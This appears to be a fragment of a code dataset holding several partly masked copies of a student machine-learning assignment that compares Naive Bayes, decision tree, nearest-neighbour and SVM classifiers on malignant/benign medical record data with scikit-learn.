\"\"\"\n Print a nice introduction to the classifier being tested and used.\n \n @param:\n name: string holding the name of the classifier type\n params: dict holding the name of the hyperparameter to be optimized\n \n @return:\n None. Print to console. \n \"\"\"\n print(\n '\\n\\n\\n\\n***************************************************************'\n )\n print('* {} CLASSIFIER'.format(name))\n if params is not None:\n print('\\nHyperparameter: ' + list(params.keys())[0])\n print('Values Tested: {} values from {} to {}'.format(len(list(\n params.values())[0]), min(list(params.values())[0]), max(list(\n params.values())[0])))\n print('\\nWorking...')\n\n\nif __name__ == '__main__':\n class_labels = 'Malignant', 'Benign'\n path_to_data = 'medical_records.data'\n test_set_ratio = 0.2\n function_list = [build_NB_classifier, build_DT_classifier,\n build_NN_classifier, build_SVM_classifier]\n print_introduction(my_team())\n data, labels = prepare_dataset(path_to_data)\n train_data, test_data, train_labels, test_labels = (model_selection.\n train_test_split(data, labels, test_size=test_set_ratio,\n random_state=1))\n print(\n '\\n\\nTraining set: {:.1f}% of data, {} samples, {} positive ({:.1f}%)'\n .format((1 - test_set_ratio) * 100, len(train_data), sum(\n train_labels), sum(train_labels) * 100 / len(train_data)))\n print('Test set: {:.1f}% of data, {} samples, {} positive ({:.1f}%)'.\n format(test_set_ratio * 100, len(test_data), sum(test_labels), sum(\n test_labels) * 100 / len(test_data)))\n for function in function_list:\n if function is build_NB_classifier:\n t0 = time.time()\n clf, cv_results = function(train_data, train_labels)\n print_cv_report(cv_results)\n else:\n t0 = time.time()\n clf = function(train_data, train_labels)\n print_grid_search_report(clf)\n plot_grid_search_results(clf)\n t1 = time.time()\n print(\n '\\nCross-validation, optimization, and fitting took {:.6f} seconds total.'\n .format(t1 - t0))\n pred_train_labels = clf.predict(train_data)\n t2 = time.time()\n print('\\n\\n- - - TRAINING REPORT - - -')\n print_prediction_report(pred_train_labels, train_labels, class_labels)\n print('\\nPrediction on training set took {:.6f} seconds.'.format(t2 -\n t1))\n t3 = time.time()\n pred_labels = clf.predict(test_data)\n t4 = time.time()\n print('\\n\\n- - - TEST REPORT - - -')\n print_prediction_report(pred_labels, test_labels, class_labels)\n print('\\nPrediction on test set took {:.6f} seconds.'.format(t4 - t3))\n",
"<docstring token>\n<import token>\n\n\ndef my_team():\n \"\"\"\n Return the list of the team members of this assignment submission as a list\n of triplet of the form (student_number, first_name, last_name)\n \n \"\"\"\n return [(10155856, 'Mackenzie', 'Wilson'), (10157182, 'Nicole', 'Barritt')]\n\n\ndef prepare_dataset(dataset_path):\n \"\"\" \n Read a comma separated text file where \n\t- the first field is a ID number \n\t- the second field is a class label 'B' or 'M'\n\t- the remaining fields are real-valued\n\n Return two numpy arrays X and y where \n\t- X is two dimensional. X[i,:] is the ith example\n\t- y is one dimensional. y[i] is the class label of X[i,:]\n y[i] should be set to 1 for 'M', and 0 for 'B'\n\n @param dataset_path: full path of the dataset text file\n\n @return\n\tX,y\n \"\"\"\n file_as_array = np.genfromtxt(dataset_path, dtype='str', delimiter=',')\n num_examples = file_as_array.shape[0]\n num_features = file_as_array.shape[1]\n X = np.zeros((num_examples, num_features - 1))\n X[:, 0] = file_as_array.copy()[:, 0]\n X[:, 1:] = file_as_array[:, 2:]\n y = np.zeros_like(file_as_array[:, 1], dtype=int)\n for i in range(len(y)):\n y[i] = file_as_array[i, 1] == 'M'\n return X, y\n\n\ndef build_NB_classifier(X_training, y_training):\n \"\"\" \n Build a Naive Bayes classifier based on the training set X_training, \n y_training, optimized for the hyperparameters passed.\n\n @param \n X_training: X_training[i,:] is the ith example\n y_training: y_training[i] is the class label of X_training[i,:]\n\n @return\n nbc: the naive bayes classifier built in this function\n results: the dict of scores returned by cross validation, since \n GridSearchCV would also return this but it cannot be used for \n NB with no hyperparameter to optimize, and CV must be done before\n fitting takes place (and fitting happens here)\n \"\"\"\n print_clf_intro('NAIVE BAYES')\n nbc = naive_bayes.MultinomialNB()\n results = model_selection.cross_validate(nbc, X_training, y_training,\n return_train_score=True, scoring=['accuracy', 'precision',\n 'roc_auc', 'recall', 'f1'])\n nbc.fit(X_training, y_training)\n return nbc, results\n\n\ndef build_DT_classifier(X_training, y_training):\n \"\"\" \n Build a Decision Tree classifier based on the training set X_training, \n y_training, optimized for the hyperparameters passed.\n\n @param \n X_training: X_training[i,:] is the ith example\n y_training: y_training[i] is the class label of X_training[i,:]\n\n @return\n dtc: the decision tree classifier built in this function (i.e. a \n GridSearchCV object that is usable exactly as a clf object, but\n allows access to scores from HP optimization)\n \"\"\"\n params = {'max_depth': np.linspace(1, 100, 100, dtype=int)}\n print_clf_intro('DECISION TREE', params)\n dtc = model_selection.GridSearchCV(tree.DecisionTreeClassifier(\n random_state=5), params, return_train_score=True, scoring=[\n 'accuracy', 'roc_auc', 'precision', 'recall', 'f1'], refit='roc_auc')\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n dtc.fit(X_training, y_training)\n return dtc\n\n\ndef build_NN_classifier(X_training, y_training):\n \"\"\" \n Build a Nearrest Neighbours classifier based on the training set X_training, \n y_training, optimized for the hyperparameters passed. \n\n @param \n X_training: X_training[i,:] is the ith example\n y_training: y_training[i] is the class label of X_training[i,:]\n\n @return\n knn: the k-nearest neighbors classifier built in this function (i.e. a \n GridSearchCV object that is usable exactly as a clf object, but\n allows access to scores from HP optimization)\n \"\"\"\n params = {'n_neighbors': np.linspace(1, 200, 200, dtype=int)}\n print_clf_intro('NEAREST NEIGHBOR', params)\n knn = model_selection.GridSearchCV(neighbors.KNeighborsClassifier(),\n params, return_train_score=True, scoring=['accuracy', 'roc_auc',\n 'precision', 'recall', 'f1'], refit='roc_auc')\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n knn.fit(X_training, y_training)\n return knn\n\n\ndef build_SVM_classifier(X_training, y_training):\n \"\"\" \n Build a Support Vector Machine classifier based on the training set X_training, y_training.\n\n @param \n X_training: X_training[i,:] is the ith example\n y_training: y_training[i] is the class label of X_training[i,:]\n\n @return\n svm: the svm classifier built in this function (i.e. a GridSearchCV \n object that is usable exactly as a clf object, but allows access \n to scores from HP optimization)\n \"\"\"\n params = {'gamma': np.logspace(-10, 1, 100)}\n print_clf_intro('SUPPORT VECTOR MACHINE', params)\n svc = model_selection.GridSearchCV(svm.SVC(), params,\n return_train_score=True, scoring=['accuracy', 'roc_auc',\n 'precision', 'recall', 'f1'], refit='roc_auc')\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n svc.fit(X_training, y_training)\n return svc\n\n\ndef print_prediction_report(y_pred, y_true, names):\n \"\"\"\n Return a bunch of statistics and metrics reporting the performance of a \n certain classifier model on the given training data. \n \n @param:\n y_true: A np-array of the target class labels as integers\n y_pred: A np-array of the classifier-predicted class labels as integers\n names: A tuple of the class labels (str), corresponding to (1,0) \n binary integer class labels\n \n @return:\n None. Print to console. \n \"\"\"\n labels = 1, 0\n print('\\nConfusion Matrix:')\n cm = metrics.confusion_matrix(y_true, y_pred, labels)\n assert len(names) == len(cm)\n assert cm.shape == (2, 2)\n print('{:14} {:10} {:10} {:3}'.format('PREDICTED:', names[0], names[1],\n 'All'))\n print('ACTUAL: ')\n print('{:14} {:3} {:3} {:1} {:2} {:3} {:5}'.format(names[0], '(TP)', cm\n [0, 0], '', '(FN)', cm[0, 1], sum(cm[0])))\n print('{:14} {:3} {:3} {:1} {:2} {:3} {:5}'.format(names[1], '(FP)', cm\n [1, 0], '', '(TN)', cm[1, 1], sum(cm[1])))\n print('{:14} {:8} {:10} {:5}'.format('All', sum(cm[:, 0]), sum(cm[:, 1]\n ), sum(sum(cm))))\n print('\\nClassification Report:')\n print(metrics.classification_report(y_true, y_pred, labels,\n target_names=names))\n print('\\nOverall Metrics:')\n print('{:14} {:.2f}'.format('accuracy:', metrics.accuracy_score(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('roc_auc:', metrics.roc_auc_score(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('precision:', metrics.precision_score(\n y_true, y_pred)))\n print('{:14} {:.2f}'.format('recall:', metrics.recall_score(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('f1:', metrics.f1_score(y_true, y_pred)))\n print('{:14} {:.2f}'.format('lgrthmc loss:', metrics.log_loss(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('mse:', metrics.mean_squared_error(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('variance:', metrics.\n explained_variance_score(y_true, y_pred)))\n\n\ndef print_cv_report(r):\n \"\"\"\n Print nicely formatted statistics from GridSearchCV results. This includes\n the mean and std statistics for all scores used (2), on both training and\n test data (known as validation dataset).\n \n @param:\n results: a dict of results from running sklearn.model_selection.cross_validate,\n scored by accuracy, roc_auc, precision and recall. \n \n @return:\n None. Print to console. \n \"\"\"\n score_grid = ['accuracy', 'precision', 'recall', 'f1', 'roc_auc']\n print('\\n\\n- - - VALIDATION REPORT - - -')\n print('\\n{:12} {:10} {:10}'.format('', 'TRAINING', 'VALIDATION'))\n for metric in score_grid:\n print('{:12} {:8.2f} {:12.2f}'.format(metric + ':', np.mean(r[\n 'train_%s' % metric]), np.mean(r['test_%s' % metric])))\n print('\\nMean fit time: {:.6f} seconds'.format(np.mean(r['fit_time'])))\n print('Mean score time: {:.6f} seconds'.format(np.mean(r['score_time'])))\n\n\ndef print_grid_search_report(grid):\n \"\"\"\n Print nicely formatted statistics from GridSearchCV results. This includes\n the mean and std statistics for all scores used (2), on both training and\n test data (known as validation dataset).\n \n @param:\n grid: a GridSearchCV object scored by accuracy, roc_auc, precision and \n recall, that has been fitted and therefore is available for \n access through cv_results_\n \n @return:\n None. Print to console. \n \"\"\"\n r = grid.cv_results_\n i = grid.best_index_\n score_grid = clf.scoring\n print('\\n\\n- - - VALIDATION REPORT - - -')\n print(\n \"Based on validation {} scores, the best value for hyperparameter '{}' is:\\n{}\"\n .format(grid.refit, list(grid.best_params_.keys())[0], list(grid.\n best_params_.values())[0]))\n print('\\n{:12} {:10} {:10}'.format('', 'TRAINING', 'VALIDATION'))\n for metric in score_grid:\n print('{:12} {:8.2f} {:12.2f}'.format(metric + ':', r[\n 'mean_train_%s' % metric][i], r['mean_test_%s' % metric][i]))\n print('\\nMean fit time: {:.6f} seconds'.format(r['mean_fit_time'][i]))\n print('Mean score time: {:.6f} seconds'.format(r['mean_score_time'][i]))\n\n\ndef plot_grid_search_results(clf):\n param_name = list(clf.param_grid.keys())[0]\n param_vals = list(clf.param_grid.values())[0]\n metrics = clf.scoring\n score_grid = []\n for name in metrics:\n score_grid.append(clf.cv_results_['mean_test_%s' % name])\n p = plt\n idx = 0\n for scores in score_grid:\n p.plot(param_vals, scores, '-', label=metrics[idx])\n idx += 1\n p.title('Hyperparameter Optimization by Cross-Validation')\n p.xlabel(param_name + ' value')\n if param_name == 'gamma':\n p.xscale('log')\n p.ylabel('average test score')\n p.legend(loc='lower right')\n p.grid(True)\n p.show()\n\n\ndef print_introduction(team_array):\n \"\"\"\n Print a nice introduction to the code being run, including well-formatted\n team member list.\n \n @param:\n team_array: array of student numbers and names returned form my_team()\n \n @return:\n None. Print to console. \n \"\"\"\n print('\\n\\n***************************************************************'\n )\n print(' CAB320 ASSIGNMENT 2: MACHINE LEARNING ')\n print('***************************************************************')\n print('\\nTEAM MEMBERS:')\n for person in team_array:\n print('{:4} {:4} {:10} {:10}'.format(person[0], ':', person[1],\n person[2]))\n\n\ndef print_clf_intro(name, params=None):\n \"\"\"\n Print a nice introduction to the classifier being tested and used.\n \n @param:\n name: string holding the name of the classifier type\n params: dict holding the name of the hyperparameter to be optimized\n \n @return:\n None. Print to console. \n \"\"\"\n print(\n '\\n\\n\\n\\n***************************************************************'\n )\n print('* {} CLASSIFIER'.format(name))\n if params is not None:\n print('\\nHyperparameter: ' + list(params.keys())[0])\n print('Values Tested: {} values from {} to {}'.format(len(list(\n params.values())[0]), min(list(params.values())[0]), max(list(\n params.values())[0])))\n print('\\nWorking...')\n\n\n<code token>\n",
"<docstring token>\n<import token>\n\n\ndef my_team():\n \"\"\"\n Return the list of the team members of this assignment submission as a list\n of triplet of the form (student_number, first_name, last_name)\n \n \"\"\"\n return [(10155856, 'Mackenzie', 'Wilson'), (10157182, 'Nicole', 'Barritt')]\n\n\ndef prepare_dataset(dataset_path):\n \"\"\" \n Read a comma separated text file where \n\t- the first field is a ID number \n\t- the second field is a class label 'B' or 'M'\n\t- the remaining fields are real-valued\n\n Return two numpy arrays X and y where \n\t- X is two dimensional. X[i,:] is the ith example\n\t- y is one dimensional. y[i] is the class label of X[i,:]\n y[i] should be set to 1 for 'M', and 0 for 'B'\n\n @param dataset_path: full path of the dataset text file\n\n @return\n\tX,y\n \"\"\"\n file_as_array = np.genfromtxt(dataset_path, dtype='str', delimiter=',')\n num_examples = file_as_array.shape[0]\n num_features = file_as_array.shape[1]\n X = np.zeros((num_examples, num_features - 1))\n X[:, 0] = file_as_array.copy()[:, 0]\n X[:, 1:] = file_as_array[:, 2:]\n y = np.zeros_like(file_as_array[:, 1], dtype=int)\n for i in range(len(y)):\n y[i] = file_as_array[i, 1] == 'M'\n return X, y\n\n\ndef build_NB_classifier(X_training, y_training):\n \"\"\" \n Build a Naive Bayes classifier based on the training set X_training, \n y_training, optimized for the hyperparameters passed.\n\n @param \n X_training: X_training[i,:] is the ith example\n y_training: y_training[i] is the class label of X_training[i,:]\n\n @return\n nbc: the naive bayes classifier built in this function\n results: the dict of scores returned by cross validation, since \n GridSearchCV would also return this but it cannot be used for \n NB with no hyperparameter to optimize, and CV must be done before\n fitting takes place (and fitting happens here)\n \"\"\"\n print_clf_intro('NAIVE BAYES')\n nbc = naive_bayes.MultinomialNB()\n results = model_selection.cross_validate(nbc, X_training, y_training,\n return_train_score=True, scoring=['accuracy', 'precision',\n 'roc_auc', 'recall', 'f1'])\n nbc.fit(X_training, y_training)\n return nbc, results\n\n\ndef build_DT_classifier(X_training, y_training):\n \"\"\" \n Build a Decision Tree classifier based on the training set X_training, \n y_training, optimized for the hyperparameters passed.\n\n @param \n X_training: X_training[i,:] is the ith example\n y_training: y_training[i] is the class label of X_training[i,:]\n\n @return\n dtc: the decision tree classifier built in this function (i.e. a \n GridSearchCV object that is usable exactly as a clf object, but\n allows access to scores from HP optimization)\n \"\"\"\n params = {'max_depth': np.linspace(1, 100, 100, dtype=int)}\n print_clf_intro('DECISION TREE', params)\n dtc = model_selection.GridSearchCV(tree.DecisionTreeClassifier(\n random_state=5), params, return_train_score=True, scoring=[\n 'accuracy', 'roc_auc', 'precision', 'recall', 'f1'], refit='roc_auc')\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n dtc.fit(X_training, y_training)\n return dtc\n\n\n<function token>\n\n\ndef build_SVM_classifier(X_training, y_training):\n \"\"\" \n Build a Support Vector Machine classifier based on the training set X_training, y_training.\n\n @param \n X_training: X_training[i,:] is the ith example\n y_training: y_training[i] is the class label of X_training[i,:]\n\n @return\n svm: the svm classifier built in this function (i.e. a GridSearchCV \n object that is usable exactly as a clf object, but allows access \n to scores from HP optimization)\n \"\"\"\n params = {'gamma': np.logspace(-10, 1, 100)}\n print_clf_intro('SUPPORT VECTOR MACHINE', params)\n svc = model_selection.GridSearchCV(svm.SVC(), params,\n return_train_score=True, scoring=['accuracy', 'roc_auc',\n 'precision', 'recall', 'f1'], refit='roc_auc')\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n svc.fit(X_training, y_training)\n return svc\n\n\ndef print_prediction_report(y_pred, y_true, names):\n \"\"\"\n Return a bunch of statistics and metrics reporting the performance of a \n certain classifier model on the given training data. \n \n @param:\n y_true: A np-array of the target class labels as integers\n y_pred: A np-array of the classifier-predicted class labels as integers\n names: A tuple of the class labels (str), corresponding to (1,0) \n binary integer class labels\n \n @return:\n None. Print to console. \n \"\"\"\n labels = 1, 0\n print('\\nConfusion Matrix:')\n cm = metrics.confusion_matrix(y_true, y_pred, labels)\n assert len(names) == len(cm)\n assert cm.shape == (2, 2)\n print('{:14} {:10} {:10} {:3}'.format('PREDICTED:', names[0], names[1],\n 'All'))\n print('ACTUAL: ')\n print('{:14} {:3} {:3} {:1} {:2} {:3} {:5}'.format(names[0], '(TP)', cm\n [0, 0], '', '(FN)', cm[0, 1], sum(cm[0])))\n print('{:14} {:3} {:3} {:1} {:2} {:3} {:5}'.format(names[1], '(FP)', cm\n [1, 0], '', '(TN)', cm[1, 1], sum(cm[1])))\n print('{:14} {:8} {:10} {:5}'.format('All', sum(cm[:, 0]), sum(cm[:, 1]\n ), sum(sum(cm))))\n print('\\nClassification Report:')\n print(metrics.classification_report(y_true, y_pred, labels,\n target_names=names))\n print('\\nOverall Metrics:')\n print('{:14} {:.2f}'.format('accuracy:', metrics.accuracy_score(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('roc_auc:', metrics.roc_auc_score(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('precision:', metrics.precision_score(\n y_true, y_pred)))\n print('{:14} {:.2f}'.format('recall:', metrics.recall_score(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('f1:', metrics.f1_score(y_true, y_pred)))\n print('{:14} {:.2f}'.format('lgrthmc loss:', metrics.log_loss(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('mse:', metrics.mean_squared_error(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('variance:', metrics.\n explained_variance_score(y_true, y_pred)))\n\n\ndef print_cv_report(r):\n \"\"\"\n Print nicely formatted statistics from GridSearchCV results. This includes\n the mean and std statistics for all scores used (2), on both training and\n test data (known as validation dataset).\n \n @param:\n results: a dict of results from running sklearn.model_selection.cross_validate,\n scored by accuracy, roc_auc, precision and recall. \n \n @return:\n None. Print to console. \n \"\"\"\n score_grid = ['accuracy', 'precision', 'recall', 'f1', 'roc_auc']\n print('\\n\\n- - - VALIDATION REPORT - - -')\n print('\\n{:12} {:10} {:10}'.format('', 'TRAINING', 'VALIDATION'))\n for metric in score_grid:\n print('{:12} {:8.2f} {:12.2f}'.format(metric + ':', np.mean(r[\n 'train_%s' % metric]), np.mean(r['test_%s' % metric])))\n print('\\nMean fit time: {:.6f} seconds'.format(np.mean(r['fit_time'])))\n print('Mean score time: {:.6f} seconds'.format(np.mean(r['score_time'])))\n\n\ndef print_grid_search_report(grid):\n \"\"\"\n Print nicely formatted statistics from GridSearchCV results. This includes\n the mean and std statistics for all scores used (2), on both training and\n test data (known as validation dataset).\n \n @param:\n grid: a GridSearchCV object scored by accuracy, roc_auc, precision and \n recall, that has been fitted and therefore is available for \n access through cv_results_\n \n @return:\n None. Print to console. \n \"\"\"\n r = grid.cv_results_\n i = grid.best_index_\n score_grid = clf.scoring\n print('\\n\\n- - - VALIDATION REPORT - - -')\n print(\n \"Based on validation {} scores, the best value for hyperparameter '{}' is:\\n{}\"\n .format(grid.refit, list(grid.best_params_.keys())[0], list(grid.\n best_params_.values())[0]))\n print('\\n{:12} {:10} {:10}'.format('', 'TRAINING', 'VALIDATION'))\n for metric in score_grid:\n print('{:12} {:8.2f} {:12.2f}'.format(metric + ':', r[\n 'mean_train_%s' % metric][i], r['mean_test_%s' % metric][i]))\n print('\\nMean fit time: {:.6f} seconds'.format(r['mean_fit_time'][i]))\n print('Mean score time: {:.6f} seconds'.format(r['mean_score_time'][i]))\n\n\ndef plot_grid_search_results(clf):\n param_name = list(clf.param_grid.keys())[0]\n param_vals = list(clf.param_grid.values())[0]\n metrics = clf.scoring\n score_grid = []\n for name in metrics:\n score_grid.append(clf.cv_results_['mean_test_%s' % name])\n p = plt\n idx = 0\n for scores in score_grid:\n p.plot(param_vals, scores, '-', label=metrics[idx])\n idx += 1\n p.title('Hyperparameter Optimization by Cross-Validation')\n p.xlabel(param_name + ' value')\n if param_name == 'gamma':\n p.xscale('log')\n p.ylabel('average test score')\n p.legend(loc='lower right')\n p.grid(True)\n p.show()\n\n\ndef print_introduction(team_array):\n \"\"\"\n Print a nice introduction to the code being run, including well-formatted\n team member list.\n \n @param:\n team_array: array of student numbers and names returned form my_team()\n \n @return:\n None. Print to console. \n \"\"\"\n print('\\n\\n***************************************************************'\n )\n print(' CAB320 ASSIGNMENT 2: MACHINE LEARNING ')\n print('***************************************************************')\n print('\\nTEAM MEMBERS:')\n for person in team_array:\n print('{:4} {:4} {:10} {:10}'.format(person[0], ':', person[1],\n person[2]))\n\n\ndef print_clf_intro(name, params=None):\n \"\"\"\n Print a nice introduction to the classifier being tested and used.\n \n @param:\n name: string holding the name of the classifier type\n params: dict holding the name of the hyperparameter to be optimized\n \n @return:\n None. Print to console. \n \"\"\"\n print(\n '\\n\\n\\n\\n***************************************************************'\n )\n print('* {} CLASSIFIER'.format(name))\n if params is not None:\n print('\\nHyperparameter: ' + list(params.keys())[0])\n print('Values Tested: {} values from {} to {}'.format(len(list(\n params.values())[0]), min(list(params.values())[0]), max(list(\n params.values())[0])))\n print('\\nWorking...')\n\n\n<code token>\n",
"<docstring token>\n<import token>\n\n\ndef my_team():\n \"\"\"\n Return the list of the team members of this assignment submission as a list\n of triplet of the form (student_number, first_name, last_name)\n \n \"\"\"\n return [(10155856, 'Mackenzie', 'Wilson'), (10157182, 'Nicole', 'Barritt')]\n\n\ndef prepare_dataset(dataset_path):\n \"\"\" \n Read a comma separated text file where \n\t- the first field is a ID number \n\t- the second field is a class label 'B' or 'M'\n\t- the remaining fields are real-valued\n\n Return two numpy arrays X and y where \n\t- X is two dimensional. X[i,:] is the ith example\n\t- y is one dimensional. y[i] is the class label of X[i,:]\n y[i] should be set to 1 for 'M', and 0 for 'B'\n\n @param dataset_path: full path of the dataset text file\n\n @return\n\tX,y\n \"\"\"\n file_as_array = np.genfromtxt(dataset_path, dtype='str', delimiter=',')\n num_examples = file_as_array.shape[0]\n num_features = file_as_array.shape[1]\n X = np.zeros((num_examples, num_features - 1))\n X[:, 0] = file_as_array.copy()[:, 0]\n X[:, 1:] = file_as_array[:, 2:]\n y = np.zeros_like(file_as_array[:, 1], dtype=int)\n for i in range(len(y)):\n y[i] = file_as_array[i, 1] == 'M'\n return X, y\n\n\n<function token>\n\n\ndef build_DT_classifier(X_training, y_training):\n \"\"\" \n Build a Decision Tree classifier based on the training set X_training, \n y_training, optimized for the hyperparameters passed.\n\n @param \n X_training: X_training[i,:] is the ith example\n y_training: y_training[i] is the class label of X_training[i,:]\n\n @return\n dtc: the decision tree classifier built in this function (i.e. a \n GridSearchCV object that is usable exactly as a clf object, but\n allows access to scores from HP optimization)\n \"\"\"\n params = {'max_depth': np.linspace(1, 100, 100, dtype=int)}\n print_clf_intro('DECISION TREE', params)\n dtc = model_selection.GridSearchCV(tree.DecisionTreeClassifier(\n random_state=5), params, return_train_score=True, scoring=[\n 'accuracy', 'roc_auc', 'precision', 'recall', 'f1'], refit='roc_auc')\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n dtc.fit(X_training, y_training)\n return dtc\n\n\n<function token>\n\n\ndef build_SVM_classifier(X_training, y_training):\n \"\"\" \n Build a Support Vector Machine classifier based on the training set X_training, y_training.\n\n @param \n X_training: X_training[i,:] is the ith example\n y_training: y_training[i] is the class label of X_training[i,:]\n\n @return\n svm: the svm classifier built in this function (i.e. a GridSearchCV \n object that is usable exactly as a clf object, but allows access \n to scores from HP optimization)\n \"\"\"\n params = {'gamma': np.logspace(-10, 1, 100)}\n print_clf_intro('SUPPORT VECTOR MACHINE', params)\n svc = model_selection.GridSearchCV(svm.SVC(), params,\n return_train_score=True, scoring=['accuracy', 'roc_auc',\n 'precision', 'recall', 'f1'], refit='roc_auc')\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n svc.fit(X_training, y_training)\n return svc\n\n\ndef print_prediction_report(y_pred, y_true, names):\n \"\"\"\n Return a bunch of statistics and metrics reporting the performance of a \n certain classifier model on the given training data. \n \n @param:\n y_true: A np-array of the target class labels as integers\n y_pred: A np-array of the classifier-predicted class labels as integers\n names: A tuple of the class labels (str), corresponding to (1,0) \n binary integer class labels\n \n @return:\n None. Print to console. \n \"\"\"\n labels = 1, 0\n print('\\nConfusion Matrix:')\n cm = metrics.confusion_matrix(y_true, y_pred, labels)\n assert len(names) == len(cm)\n assert cm.shape == (2, 2)\n print('{:14} {:10} {:10} {:3}'.format('PREDICTED:', names[0], names[1],\n 'All'))\n print('ACTUAL: ')\n print('{:14} {:3} {:3} {:1} {:2} {:3} {:5}'.format(names[0], '(TP)', cm\n [0, 0], '', '(FN)', cm[0, 1], sum(cm[0])))\n print('{:14} {:3} {:3} {:1} {:2} {:3} {:5}'.format(names[1], '(FP)', cm\n [1, 0], '', '(TN)', cm[1, 1], sum(cm[1])))\n print('{:14} {:8} {:10} {:5}'.format('All', sum(cm[:, 0]), sum(cm[:, 1]\n ), sum(sum(cm))))\n print('\\nClassification Report:')\n print(metrics.classification_report(y_true, y_pred, labels,\n target_names=names))\n print('\\nOverall Metrics:')\n print('{:14} {:.2f}'.format('accuracy:', metrics.accuracy_score(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('roc_auc:', metrics.roc_auc_score(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('precision:', metrics.precision_score(\n y_true, y_pred)))\n print('{:14} {:.2f}'.format('recall:', metrics.recall_score(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('f1:', metrics.f1_score(y_true, y_pred)))\n print('{:14} {:.2f}'.format('lgrthmc loss:', metrics.log_loss(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('mse:', metrics.mean_squared_error(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('variance:', metrics.\n explained_variance_score(y_true, y_pred)))\n\n\ndef print_cv_report(r):\n \"\"\"\n Print nicely formatted statistics from GridSearchCV results. This includes\n the mean and std statistics for all scores used (2), on both training and\n test data (known as validation dataset).\n \n @param:\n results: a dict of results from running sklearn.model_selection.cross_validate,\n scored by accuracy, roc_auc, precision and recall. \n \n @return:\n None. Print to console. \n \"\"\"\n score_grid = ['accuracy', 'precision', 'recall', 'f1', 'roc_auc']\n print('\\n\\n- - - VALIDATION REPORT - - -')\n print('\\n{:12} {:10} {:10}'.format('', 'TRAINING', 'VALIDATION'))\n for metric in score_grid:\n print('{:12} {:8.2f} {:12.2f}'.format(metric + ':', np.mean(r[\n 'train_%s' % metric]), np.mean(r['test_%s' % metric])))\n print('\\nMean fit time: {:.6f} seconds'.format(np.mean(r['fit_time'])))\n print('Mean score time: {:.6f} seconds'.format(np.mean(r['score_time'])))\n\n\ndef print_grid_search_report(grid):\n \"\"\"\n Print nicely formatted statistics from GridSearchCV results. This includes\n the mean and std statistics for all scores used (2), on both training and\n test data (known as validation dataset).\n \n @param:\n grid: a GridSearchCV object scored by accuracy, roc_auc, precision and \n recall, that has been fitted and therefore is available for \n access through cv_results_\n \n @return:\n None. Print to console. \n \"\"\"\n r = grid.cv_results_\n i = grid.best_index_\n score_grid = clf.scoring\n print('\\n\\n- - - VALIDATION REPORT - - -')\n print(\n \"Based on validation {} scores, the best value for hyperparameter '{}' is:\\n{}\"\n .format(grid.refit, list(grid.best_params_.keys())[0], list(grid.\n best_params_.values())[0]))\n print('\\n{:12} {:10} {:10}'.format('', 'TRAINING', 'VALIDATION'))\n for metric in score_grid:\n print('{:12} {:8.2f} {:12.2f}'.format(metric + ':', r[\n 'mean_train_%s' % metric][i], r['mean_test_%s' % metric][i]))\n print('\\nMean fit time: {:.6f} seconds'.format(r['mean_fit_time'][i]))\n print('Mean score time: {:.6f} seconds'.format(r['mean_score_time'][i]))\n\n\ndef plot_grid_search_results(clf):\n param_name = list(clf.param_grid.keys())[0]\n param_vals = list(clf.param_grid.values())[0]\n metrics = clf.scoring\n score_grid = []\n for name in metrics:\n score_grid.append(clf.cv_results_['mean_test_%s' % name])\n p = plt\n idx = 0\n for scores in score_grid:\n p.plot(param_vals, scores, '-', label=metrics[idx])\n idx += 1\n p.title('Hyperparameter Optimization by Cross-Validation')\n p.xlabel(param_name + ' value')\n if param_name == 'gamma':\n p.xscale('log')\n p.ylabel('average test score')\n p.legend(loc='lower right')\n p.grid(True)\n p.show()\n\n\ndef print_introduction(team_array):\n \"\"\"\n Print a nice introduction to the code being run, including well-formatted\n team member list.\n \n @param:\n team_array: array of student numbers and names returned form my_team()\n \n @return:\n None. Print to console. \n \"\"\"\n print('\\n\\n***************************************************************'\n )\n print(' CAB320 ASSIGNMENT 2: MACHINE LEARNING ')\n print('***************************************************************')\n print('\\nTEAM MEMBERS:')\n for person in team_array:\n print('{:4} {:4} {:10} {:10}'.format(person[0], ':', person[1],\n person[2]))\n\n\ndef print_clf_intro(name, params=None):\n \"\"\"\n Print a nice introduction to the classifier being tested and used.\n \n @param:\n name: string holding the name of the classifier type\n params: dict holding the name of the hyperparameter to be optimized\n \n @return:\n None. Print to console. \n \"\"\"\n print(\n '\\n\\n\\n\\n***************************************************************'\n )\n print('* {} CLASSIFIER'.format(name))\n if params is not None:\n print('\\nHyperparameter: ' + list(params.keys())[0])\n print('Values Tested: {} values from {} to {}'.format(len(list(\n params.values())[0]), min(list(params.values())[0]), max(list(\n params.values())[0])))\n print('\\nWorking...')\n\n\n<code token>\n",
